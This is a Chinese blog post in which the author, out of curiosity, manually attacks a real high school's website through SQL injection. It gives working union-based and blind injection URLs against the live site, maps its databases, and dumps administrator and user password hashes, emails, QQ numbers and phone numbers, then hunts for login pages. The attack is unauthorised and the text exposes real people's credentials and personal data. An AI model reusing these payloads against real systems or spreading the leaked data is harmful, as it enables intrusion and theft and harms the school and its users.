SQL注入过程

作者: 李佶澳   转载保留:原文地址   更新时间:2017/10/28 12:34:31

摘要

好奇. 搜索到几个注入点后, 尝试手动注入了下.

某高中注入点

http://www.dyyz.net.cn/celebrate/view.php?id=1022%20and%20(select%20count(*)%20from%20mysql.user)=1

mysql.user中只有一个用户

http://www.dyyz.net.cn/celebrate/view.php?id=1022%20and%20(select%20count(*)%20from%20mysql.user%20where%20length(user)%20%20=%204)%20%3E0

用户名长度是4个字符,肯定是root..

http://www.dyyz.net.cn/celebrate/view.php?id=1022%20and%20(select%20count(*)%20from%20mysql.user%20where%20%20(ascii(substring(user,1,1)))=114)=1

第一个字母是r

http://www.dyyz.net.cn/celebrate/view.php?id=1022%20and%20(select%20count(*)%20from%20mysql.user%20where%20%20(ascii(substring(user,2,1)))=111)=1

第二个字母是o

http://www.dyyz.net.cn/celebrate/view.php?id=1022%20and%20(select%20count(*)%20from%20mysql.user%20where%20%20(ascii(substring(user,3,1)))=111)=1

第三个字母是o

http://www.dyyz.net.cn/celebrate/view.php?id=1022%20and%20(select%20count(*)%20from%20mysql.user%20where%20%20(ascii(substring(user,4,1)))=116)=1

第四个字母是t

http://www.dyyz.net.cn/celebrate/view.php?id=1022%20and%20(select%20count(*)%20from%20mysql.user%20where%20%20user=0x726f6f74)=1

使用root的十六进制编码0x726f6f74验证,用户名为root

http://www.dyyz.net.cn/celebrate/view.php?id=1022%20and%20session_user()%20like%200x25726F6F7425

session_user是root,   session_user() like "%root%"

http://www.dyyz.net.cn/celebrate/view.php?id=251%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29%20--

界面上出现了29

http://www.dyyz.net.cn/celebrate/view.php?id=251%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,@@version%20--

获取数据库版本, 5.0.91-community-nt

Warning: file_get_contents(D:/www/celebrate/templist/default/5.0.91-community-nt) [function.file-get-contents]: failed to open stream: No such file or directory in D:\www\celebrate\inc\temp.php on line 56

http://www.dyyz.net.cn/celebrate/view.php?id=251%20and%20(select%20count(*)%20from%20information_schema.tables)%20=109

information_schema的TABLES表中有109条记录

http://www.dyyz.net.cn/celebrate/view.php?id=251%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,(select%20count(distinct(table_schema))%20from%20information_schema.tables)%20--

一共有六个数据库

http://www.dyyz.net.cn/celebrate/view.php?id=251%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,(select%20distinct(table_schema)%20from%20information_schema.tables%20limit%200,1)%20--

第一个数据库: information_schema

http://www.dyyz.net.cn/celebrate/view.php?id=251%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,(select%20distinct(table_schema)%20from%20information_schema.tables%20limit%201,1)%20--

第二个数据库: duxcms

http://www.dyyz.net.cn/celebrate/view.php?id=251%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,(select%20distinct(table_schema)%20from%20information_schema.tables%20limit%202,1)%20--

第三个数据库: jcms

http://www.dyyz.net.cn/celebrate/view.php?id=251%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,(select%20distinct(table_schema)%20from%20information_schema.tables%20limit%203,1)%20--

第四个数据库: mysql

http://www.dyyz.net.cn/celebrate/view.php?id=251%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,(select%20distinct(table_schema)%20from%20information_schema.tables%20limit%204,1)%20--

第五个数据库: qcms

http://www.dyyz.net.cn/celebrate/view.php?id=251%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,(select%20distinct(table_schema)%20from%20information_schema.tables%20limit%205,1)%20--

第六个数据库: qcss

http://www.dyyz.net.cn/celebrate/view.php?id=251%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,(select%20group_concat(distinct(table_schema))%20from%20information_schema.tables)%20--

上面的6个操作犯傻了,group_concat可以一次性的获取说有的数据库

Warning: file_get_contents(D:/www/celebrate/templist/default/information_schema,duxcms,jcms,mysql,qcms,qcss) [function.file-get-contents]: failed to open stream: No such file or directory in D:\www\celebrate\inc\temp.php on line 56

http://www.dyyz.net.cn/celebrate/view.php?id=251%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,(select%20group_concat(distinct(table_name))%20from%20information_schema.tables%20where%20table_schema=0x647578636D73)%20--

duxcms中的所有表, "duxcms"需要用二进制表示

dc_admin
dc_admin_group
dc_admin_log
dc_admin_menu
dc_category
dc_category_jump
dc_category_page
dc_content
dc_content_data
dc_expand_model
dc_expand_model_field
dc_form
dc_form_data_guestbook
dc_form_field
dc_fragment
dc_lang
dc_model
dc_plugin
dc_position
dc_position_relation
dc_replace
dc_tags
dc_tags_category
dc_tags_relation
dc_upload


http://www.dyyz.net.cn/celebrate/view.php?id=251%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,(select%20group_concat(distinct(table_name))%20from%20information_schema.tables%20where%20table_schema=0x6A636D73)%20--

jcms中的所有表

jx_announcement
jx_article
jx_attachment
jx_category
jx_comment
jx_guestbook
jx_keywords
jx_link
jx_member
jx_model
jx_onepage
jx_safefunc
jx_set
jx_spider_rule
jx_spider_url
jx_updatehtml

http://www.dyyz.net.cn/celebrate/view.php?id=251%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,(select%20group_concat(distinct(table_name))%20from%20information_schema.tables%20where%20table_schema=0x71636D73)%20--

qcms中的所有表

qcms_admin
qcms_bq
qcms_buy
qcms_category
qcms_discuss
qcms_diy
qcms_guest
qcms_jss
qcms_news
qcms_olink
qcms_persons
qcms_plus
qcms_system
qcms_users

http://www.dyyz.net.cn/celebrate/view.php?id=251%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,(select%20group_concat(distinct(table_name))%20from%20information_schema.tables%20where%20table_schema=0x71637373)%20--

qcss中的所有表

qcms_cate
qcms_ext
qcms_file
qcms_form
qcms_forminfo
qcms_guest
qcms_module
qcms_money
qcms_news
qcms_order
qcms_pic
qcms_sys
qcms_user

总共存在以下几个敏感表:

duxcms.dc_admin 
qcms.qcms_admin 
qcms.qcms_users;
qcss.qcms_user 

http://www.dyyz.net.cn/celebrate/view.php?id=251%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=0x647578636D73%20and%20table_name=0x64635F61646D696E)%20--

duxcms.dc_admin的表结构:

id
gid
user
password
nicename
regtime
logintime
ip
status
loginnum
keep

http://www.dyyz.net.cn/celebrate/view.php?id=251%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=0x71636D73%20and%20table_name=0x71636D735F61646D696E)%20--

qcms.qcms_admin的表结构:

id
admin_name
admin_password

http://www.dyyz.net.cn/celebrate/view.php?id=251%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=0x71636D73%20and%20table_name=0x71636D735F7573657273)%20--

qcms.qcms_users的表结构:

id
username
userpwd
sex
email
qq
tel
truename
address
money

http://www.dyyz.net.cn/celebrate/view.php?id=251%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=0x71637373%20and%20table_name=0x71636D735F75736572)%20--

qcss.qcms_user的表结钩:

uid
username
password
sex
email
qq
tel
address
money
add_time
level

http://www.dyyz.net.cn/celebrate/view.php?id=251%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,(select%20group_concat(user)%20from%20duxcms.dc_admin)%20--

duxcms.dc_admin中的用户:

admin

http://www.dyyz.net.cn/celebrate/view.php?id=251%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,(select%20group_concat(user,password)%20from%20duxcms.dc_admin)%20--

ducms.dc_admin中admin用户的口令

admin   21232f297a57a5a743894a0e4a801fc3

http://www.dyyz.net.cn/celebrate/view.php?id=251%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,(select%20group_concat(admin_name)%20from%20qcms.qcms_admin)%20--

qcms.qcms_admin的用户名和口令

admin
caomh
xinfang
cmhai168

admin525320665cd767101d732e30768dd276
caomhcd384a477c8b6114a2bce922ec0c6c5e
xinfangf342dd5d36c4227a5b22d12915160e67
cmhai168c49108f46b350741a6a0674dac8d6a83

http://www.dyyz.net.cn/celebrate/view.php?id=251%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,(select%20group_concat(username,userpwd)%20from%20qcms.qcms_users)%20--

qcms.qcms_users的用户名、口令、email、qq、tel、truename、address、money

kbenfqir,ckxlllum,ibqydfyr,mlgwwsfx,yqhlmjjf,shufu,lirsetjq,yaya,,madeinchina

d41d8cd98f00b204e9800998ecf8427e
d41d8cd98f00b204e9800998ecf8427e
kbenfqir1f1767b5696e79116b11ecc7f2882783
ckxlllum1f1767b5696e79116b11ecc7f2882783
ibqydfyr1f1767b5696e79116b11ecc7f2882783
mlgwwsfx1f1767b5696e79116b11ecc7f2882783
yqhlmjjf1f1767b5696e79116b11ecc7f2882783
shufue10adc3949ba59abbe56e057f20f883e
lirsetjq1f1767b5696e79116b11ecc7

d41d8cd98f00b204e9800998ecf8427e
d41d8cd98f00b204e9800998ecf8427e
[email protected]0606
[email protected]0606
[email protected]0606
[email protected]0606

这个表总的记录是有问题的,总共4302条记录, 有的没有用户名, 有的没有密码,有效记录只有几条:

kbenfqir   1f1767b5696e79116b11ecc7f2882783
ckxlllum   1f1767b5696e79116b11ecc7f2882783
ibqydfyr   1f1767b5696e79116b11ecc7f2882783
mlgwwsfx   1f1767b5696e79116b11ecc7f2882783
yqhlmjjf   1f1767b5696e79116b11ecc7f2882783
shufu      e10adc3949ba59abbe56e057f20f883e
lirsetjq   1f1767b5696e79116b11ecc7

很多密码都是一样的, 这是个测试用的废表?

http://www.dyyz.net.cn/celebrate/view.php?id=251%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,(select%20%20group_concat(username)%20from%20qcss.qcms_user)%20--

qcss.qcms_user的用户名,密码

admin
yaoshf

admin  21232f297a57a5a743894a0e4a801fc3
yaoshf dfc301534e7ee540498f3b83133b8554
                                                             qq         tel
admin  21232f297a57a5a743894a0e4a801fc3  [email protected]  52703859   12345678 湖北大冶一中
yaoshf dfc301534e7ee540498f3b83133b8554  [email protected]             8737075  大冶一中信息中心

-- admin的QQ号码真实存在

寻找后台, 放狗(inurl:login site:dyyz.net.cn):

www.dyyz.net.cn/celebrate/login.php    //校庆分站的登陆
www.dyyz.net.cn/login.php              //主站的登陆

校庆分站貌似可以随意注册

http://www.dyyz.net.cn/celebrate/reg.php  貌似可以随意注册啊!

猜测注册的用户位于qcss.qcms_user表中, 应为这个表结构中密码列示password和页面的中密码框的名称一致

注册进去后会有什么情况..

总结

发现注入点后, 按照以下过程进行:

1  注入union语句, 猜测被注入语句查询的列数 " union select 1,2,3,4,5 --"
2  仔细观察页面, 寻找页面上可以被注入语句改写的地方
3  调整注入语句, 将关注的敏感信息读取到页面上
4  测试当前数据库用户的权限, 读取、修改、插入、写文件等

本文原创首发于网站:www.lijiaocn.com

QQ交流群

区块链实践互助QQ群:576555864

Kubernetes实践互助QQ群:947371129

Prometheus实践互助QQ群:952461804

Kong/Envoy实践互助QQ群:952503851

Ansible实践互助QQ群:955105412

Copyright @2011-2019 All rights reserved. 转载请添加原文连接,合作请加微信lijiaocn或者发送邮件: [email protected],备注网站合作 友情链接: lijiaocn github.com